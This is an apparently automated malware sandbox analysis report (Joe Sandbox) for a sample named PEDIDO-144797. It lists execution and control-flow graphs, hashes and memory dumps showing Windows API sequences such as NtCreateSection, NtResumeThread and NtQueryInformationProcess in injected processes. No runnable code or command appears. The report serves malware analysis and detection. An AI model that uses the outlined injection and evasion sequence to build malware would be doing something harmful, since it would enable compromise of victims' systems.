• Opcode ID: 87154550091c2c2e846a261ea03ae8667d2aa4d884dfdfa48349292a1e34a80c
• Instruction ID: 783d7b28b3b703744c7bfc7b865dd5a90973b2dd2608620705594a553a4e87b8
• Opcode Fuzzy Hash: 87154550091c2c2e846a261ea03ae8667d2aa4d884dfdfa48349292a1e34a80c
• Instruction Fuzzy Hash: 5D51B0F5A00B46DFEB28DFA4C5607EAB7F4AF44344F10483ED99593240EB749945CBA2
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: ^i2
                                                                                                                                          • API String ID: 3446177414-3653053131
                                                                                                                                          • Opcode ID: b9320aade08508a7700f6b5e423086cb5346389a7dc522f16f8e6e66821d663d
                                                                                                                                          • Instruction ID: 3f6b7d6c1c765b1188322195c840f7fbee401baea84874ed49d0ce664e53fab6
                                                                                                                                          • Opcode Fuzzy Hash: b9320aade08508a7700f6b5e423086cb5346389a7dc522f16f8e6e66821d663d
                                                                                                                                          • Instruction Fuzzy Hash: B8415FB9A00311DFDB19CF19C4849997BE5FF99754B20846BEC088B361DB71E891CB91
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: i2$mi2
                                                                                                                                          • API String ID: 3446177414-3611007801
                                                                                                                                          • Opcode ID: 0af238245ecbc8f9e70c4a121156819e18c9f8097fdd1e3f92eafe9d17b83a89
                                                                                                                                          • Instruction ID: 218f732e2ad663ed4f5b69d5af5392aba06798b0f8809b7c12823cbf368b17d6
                                                                                                                                          • Opcode Fuzzy Hash: 0af238245ecbc8f9e70c4a121156819e18c9f8097fdd1e3f92eafe9d17b83a89
                                                                                                                                          • Instruction Fuzzy Hash: 2211C3B6A01208AFDF11CF98D985ADEBBB8FF4C360F10401AF911B7240D775AA54CBA4

Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 19
Total number of Limit Nodes: 0
execution_graph 3993 50c991c 3997 50c992b 3993->3997 3994 50c9946 SleepEx 3996 50c9996 NtCreateSection 3994->3996 3994->3997 3995 50c9973 3996->3995 3997->3994 3997->3995 3998 50cdc18 4000 50cdc1d 3998->4000 3999 50cdd25 4000->3999 4002 50c9ab4 4000->4002 4005 50c9ada 4002->4005 4003 50c9b08 SleepEx 4004 50c9b3c 4003->4004 4003->4005 4006 50c9b75 NtResumeThread 4004->4006 4007 50c9af9 4004->4007 4005->4003 4005->4007 4006->4007 4007->3999 4008 50c98b1 4010 50c98c6 4008->4010 4009 50c9946 SleepEx 4009->4010 4011 50c9996 NtCreateSection 4009->4011 4010->4009 4012 50c9973 4010->4012 4011->4012

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 50c98b1-50c98c4 1 50c992c-50c993e 0->1 2 50c98c6 0->2 3 50c993f-50c9944 1->3 2->3 4 50c98c8-50c98f3 2->4 6 50c9946-50c9952 SleepEx 3->6 4->1 7 50c9954-50c9958 6->7 8 50c9996-50c99eb NtCreateSection 6->8 9 50c996c-50c9971 7->9 10 50c995a-50c9967 call 50d6ba4 7->10 11 50c99ed-50c9a06 8->11 12 50c9973-50c997a 8->12 9->6 9->12 10->9 11->12 17 50c9a0c-50c9a4b 11->17 15 50c997c-50c9995 12->15 17->12 19 50c9a51-50c9a8f 17->19 19->12 21 50c9a95-50c9aad 19->21 21->15
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
Similarity
• API ID: CreateSectionSleep
• String ID: 0$@$@
• API String ID: 2866269021-3221051908
• Opcode ID: ecc48c8b9e49aba649bdce03b80a7305576d51156abe5fa8b438fd95c911a9c4
• Instruction ID: f9ba1f3c4cd63a59c1ad49184a38df221b3726243325a3fd02ce8051cf951755
• Opcode Fuzzy Hash: ecc48c8b9e49aba649bdce03b80a7305576d51156abe5fa8b438fd95c911a9c4
• Instruction Fuzzy Hash: 6751CD71A18B488FCB45CF58E8853DEBBE5FF49310F10065EE88A97291DB31E142CB86

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
Similarity
• API ID: ResumeSleepThread
• String ID:
• API String ID: 1530989685-0
• Opcode ID: 5fec67864056c09bc9aaa3d34206ce9274a471ec975c8b0fa745e485cfda6ffb
• Instruction ID: 5a6df502d788d0cce6978a4fed488507fe09f649678005be6823c277818a90e0
• Opcode Fuzzy Hash: 5fec67864056c09bc9aaa3d34206ce9274a471ec975c8b0fa745e485cfda6ffb
• Instruction Fuzzy Hash: FD21D370218B4D9FDB98DF6894496AEBBD1FB59390F000B6DD85AC3291EF31E5418B41

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 42 50c991c-50c9929 43 50c992b-50c9944 42->43 44 50c9970-50c9971 42->44 45 50c9946-50c9952 SleepEx 43->45 44->45 46 50c9973-50c997a 44->46 47 50c9954-50c9958 45->47 48 50c9996-50c99eb NtCreateSection 45->48 49 50c997c-50c9995 46->49 50 50c996c-50c996e 47->50 51 50c995a-50c9967 call 50d6ba4 47->51 48->46 52 50c99ed-50c9a06 48->52 50->44 51->50 52->46 55 50c9a0c-50c9a4b 52->55 55->46 57 50c9a51-50c9a8f 55->57 57->46 59 50c9a95-50c9aad 57->59 59->49
APIs
Memory Dump Source
• Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
Similarity
• API ID: CreateSectionSleep
• String ID:
• API String ID: 2866269021-0
• Opcode ID: e256ba99ca2e8df73d4bef9c632c67323f3053b72e425abc3965123d84c068dd
• Instruction ID: 1a49a97e8009f939c925fa4d16474a58a064a8dd3d43db60c66153bcaf4d6d0e
• Opcode Fuzzy Hash: e256ba99ca2e8df73d4bef9c632c67323f3053b72e425abc3965123d84c068dd
• Instruction Fuzzy Hash: C6017B3260A7448FC71E8F48B8415FD7BA2FF43370F100A9EC8C51B191C6329442C6C5
Memory Dump Source
• Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2496161531caf1ee288c236aeb9e6b9a8fe68de0b78c80a87773afa53ce124c0
• Instruction ID: cad6e3e755b27a71b93f03c23231e82f5ebef4c9e030cbb8212b0bf13182453f
• Opcode Fuzzy Hash: 2496161531caf1ee288c236aeb9e6b9a8fe68de0b78c80a87773afa53ce124c0
• Instruction Fuzzy Hash: 3241037161CB094FD768EF6CE0816BFF7E2FB55300F50066DC98AC3252EA71E9428685

Execution Graph

Execution Coverage: 0.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 9
Total number of Limit Nodes: 1
execution_graph 68150 2f329f0 LdrInitializeThunk 68157 2ddeeba 68158 2ddeeed 68157->68158 68159 2ddf057 NtQueryInformationProcess 68158->68159 68160 2ddf091 68158->68160 68159->68160 68162 2f32b20 68164 2f32b2a 68162->68164 68165 2f32b31 68164->68165 68166 2f32b3f LdrInitializeThunk 68164->68166

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 2ddeeba-2ddeeeb 1 2ddeeed-2ddef04 call 2de10d8 0->1 2 2ddef09-2ddef28 call 2de10f8 call 2ddcec8 0->2 1->2 8 2ddef2e-2ddf02e call 2ddedf8 call 2de10f8 call 2de5064 call 2dd0398 call 2de06b8 call 2dd0398 call 2de06b8 call 2de2dc8 2->8 9 2ddf4e6-2ddf4f1 2->9 26 2ddf4da-2ddf4e1 call 2ddedf8 8->26 27 2ddf034-2ddf08c call 2dd0398 call 2de06b8 NtQueryInformationProcess call 2de10f8 8->27 26->9 34 2ddf091-2ddf0c2 call 2dd0398 call 2de06b8 27->34 39 2ddf0c4-2ddf0d1 34->39 40 2ddf0d6-2ddf14c call 2de5072 call 2dd0398 call 2de06b8 34->40 39->26 40->39 49 2ddf152-2ddf164 call 2de509c 40->49 52 2ddf1b4-2ddf1f4 call 2dd0398 call 2de06b8 call 2de3728 49->52 53 2ddf166-2ddf1af call 2de1de8 49->53 63 2ddf1f6-2ddf20e 52->63 64 2ddf213-2ddf303 call 2dd0398 call 2de06b8 call 2de50aa call 2dd0398 call 2de06b8 call 2de30e8 call 2de10a8 * 3 call 2de509c 52->64 53->26 63->26 87 2ddf305-2ddf32e call 2de509c call 2de10a8 call 2de50fe call 2de50b8 64->87 88 2ddf330-2ddf345 call 2de509c 64->88 99 2ddf385-2ddf38f 87->99 94 2ddf36e-2ddf380 call 2de1d28 88->94 95 2ddf347-2ddf369 call 2de2898 88->95 94->99 95->94 101 2ddf395-2ddf3df call 2dd0398 call 2de06b8 call 2de3408 call 2de509c 99->101 102 2ddf457-2ddf4ba call 2dd0398 call 2de06b8 call 2de3a48 99->102 121 2ddf414-2ddf41b 101->121 122 2ddf3e1-2ddf40a call 2de5148 call 2de50fe 101->122 102->26 127 2ddf4bc-2ddf4d5 call 2de10d8 102->127 124 2ddf41d-2ddf425 call 2de509c 121->124 125 2ddf427-2ddf432 121->125 122->121 124->102 124->125 125->102 129 2ddf434-2ddf452 call 2de3d68 125->129 127->26 129->102
APIs
• NtQueryInformationProcess.NTDLL ref: 02DDF076
Strings
Memory Dump Source
• Source File: 00000004.00000002.91633262138.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2dd0000_SecEdit.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
• Instruction ID: faa2cad88fbda211a811bda24079e1fdb00508e8794d448d43fdaf304fe4978b
• Opcode Fuzzy Hash: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
• Instruction Fuzzy Hash: 9C022870518A8C8FCFA5EF68D894AEE77E2FB99304F50461AD84AC7240DF34DA45CB91

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 152 2f334e0-2f334ec LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: dcf04b58ee4e181fc0e2f2a2545d7dc2e93e3db04997317b54d00bc4009933e4
• Instruction ID: 887082c98eb8ed767a6beedc9e8b6df28a052678f1d3ab6608bb783e1ad2e59c
• Opcode Fuzzy Hash: dcf04b58ee4e181fc0e2f2a2545d7dc2e93e3db04997317b54d00bc4009933e4
• Instruction Fuzzy Hash: 6290023160510402E50075584A14B07140587D0281F61C815A1414568DCBE5895175A2

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 141 2f32a80-2f32a8c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 9e67ec9d36e792674a5b05dae20140947182de766ffa57e2280e41a299e95c1a
                                                                                                                                          • Instruction ID: e89bca76910bef7e08c63546bbf99f41c2ccddfb3deb484a613ba0f91ade5ec2
                                                                                                                                          • Opcode Fuzzy Hash: 9e67ec9d36e792674a5b05dae20140947182de766ffa57e2280e41a299e95c1a
                                                                                                                                          • Instruction Fuzzy Hash: 9290026120200003550575584914A17440A87E0281B51C425E2004590DC97588917125

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 146 2f32bc0-2f32bcc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: b83fd149b71829d908c6862526d4797d6bf8a50fbb25d2980ae14fb9f8ec0e29
                                                                                                                                          • Instruction ID: 6664d8c9482922ffc2d9997b43753ada488fa749b9bcd5ed5c72e774e5647def
                                                                                                                                          • Opcode Fuzzy Hash: b83fd149b71829d908c6862526d4797d6bf8a50fbb25d2980ae14fb9f8ec0e29
                                                                                                                                          • Instruction Fuzzy Hash: 3B90023120100402E50079985908A47040587E0381F51D415A6014555ECAB588917131

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 145 2f32b90-2f32b9c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: dfdd2a7d7659576facff9458a378d7de1d7c871bbf94d550ccaecea9d84c4cdf
                                                                                                                                          • Instruction ID: f5bbad9b9cf677f64954f2b77b5c3013d0c2078bfd51d5c8802a2371233875b4
                                                                                                                                          • Opcode Fuzzy Hash: dfdd2a7d7659576facff9458a378d7de1d7c871bbf94d550ccaecea9d84c4cdf
                                                                                                                                          • Instruction Fuzzy Hash: 0890023120108802E51075588904B4B040587D0381F55C815A5414658DCAE588917121

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 144 2f32b80-2f32b8c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 001c0b6a9989248e58e0c12cb77be6ad8849660521ce288486dbab94756beddb
                                                                                                                                          • Instruction ID: 7ef2fe7dbb04ea4fd2ca6bea883f72b120c511846891c76c3240d54fe4242291
                                                                                                                                          • Opcode Fuzzy Hash: 001c0b6a9989248e58e0c12cb77be6ad8849660521ce288486dbab94756beddb
                                                                                                                                          • Instruction Fuzzy Hash: 9B90023120100842E50075584904F47040587E0381F51C41AA1114654DCA65C8517521

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 143 2f32b10-2f32b1c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 590df0ceca419257a7228a8389d1efa2843039bbb1d54c1ac737c0f820188e73
                                                                                                                                          • Instruction ID: 9492c845c79acb35a1ce948c0ae7c429c766936fed2e926ac82d29910a9881dc
                                                                                                                                          • Opcode Fuzzy Hash: 590df0ceca419257a7228a8389d1efa2843039bbb1d54c1ac737c0f820188e73
                                                                                                                                          • Instruction Fuzzy Hash: 3890023120100802E58075584904A4B040587D1381F91C419A1015654DCE658A5977A1

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 142 2f32b00-2f32b0c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 469d6654211f33d0eac883e1985c7fb3c254a102824aac62ce5f485083a0c86f
                                                                                                                                          • Instruction ID: 63454e3a87f7fcc5087ef4d0f3d09570f0074090a23c52b413fde9be8f716708
                                                                                                                                          • Opcode Fuzzy Hash: 469d6654211f33d0eac883e1985c7fb3c254a102824aac62ce5f485083a0c86f
                                                                                                                                          • Instruction Fuzzy Hash: 5290023120504842E54075584904E47041587D0385F51C415A1054694DDA758D55B661

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 140 2f329f0-2f329fc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: ec7772489568b18091fb00c3569e31e5fbf8d9c284f1bbefdd83c06a44ca074b
                                                                                                                                          • Instruction ID: 05815dad51a73667b6f307b0ab78ed511f20c1dab25b25e08c9f7b190d7856ac
                                                                                                                                          • Opcode Fuzzy Hash: ec7772489568b18091fb00c3569e31e5fbf8d9c284f1bbefdd83c06a44ca074b
                                                                                                                                          • Instruction Fuzzy Hash: A8900225211000031505B9580B04907044687D53D1351C425F2005550CDA7188616121

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 150 2f32e50-2f32e5c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 7180aaca9bc05cb33471889073e68135f74a8f9860fa805a93d9a26494404a77
                                                                                                                                          • Instruction ID: c87d9b43673007af7bec53970d4c091ed7d8b6a29e06adf4aee43fdcd79d0800
                                                                                                                                          • Opcode Fuzzy Hash: 7180aaca9bc05cb33471889073e68135f74a8f9860fa805a93d9a26494404a77
                                                                                                                                          • Instruction Fuzzy Hash: 0D90026134100442E50075584914F070405C7E1381F51C419E2054554DCA69CC527126

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 151 2f32f00-2f32f0c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 451e2e50dd7bc68d8754550e1fb5930766215bd1a751b78adf0b3098a4cc169f
                                                                                                                                          • Instruction ID: ede9546502dd0191d371a6cb6935b46fcd7c17d0597129063e74f20459447213
                                                                                                                                          • Opcode Fuzzy Hash: 451e2e50dd7bc68d8754550e1fb5930766215bd1a751b78adf0b3098a4cc169f
                                                                                                                                          • Instruction Fuzzy Hash: 4290022121180042E60079684D14F07040587D0383F51C519A1144554CCD6588616521

                                                                                                                                          Control-flow Graph
                                                                                                                                          control_flow_graph 148 2f32cf0-2f32cfc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0

Control-flow Graph

control_flow_graph 147 2f32c30-2f32c3c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

control_flow_graph 149 2f32d10-2f32d1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

control_flow_graph 136 2f32b2a-2f32b2f 137 2f32b31-2f32b38 136->137 138 2f32b3f-2f32b46 LdrInitializeThunk 136->138
APIs
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000004.00000002.91632413260.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_26c0000_SecEdit.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
• CLIENT(ntdll): Processing section info %ws..., xrefs: 02F64592
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F64507
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F64530
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F6454D
• Execute=1, xrefs: 02F6451E
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F64460
• ExecuteOptions, xrefs: 02F644AB
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
Strings
Memory Dump Source
• Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
Similarity
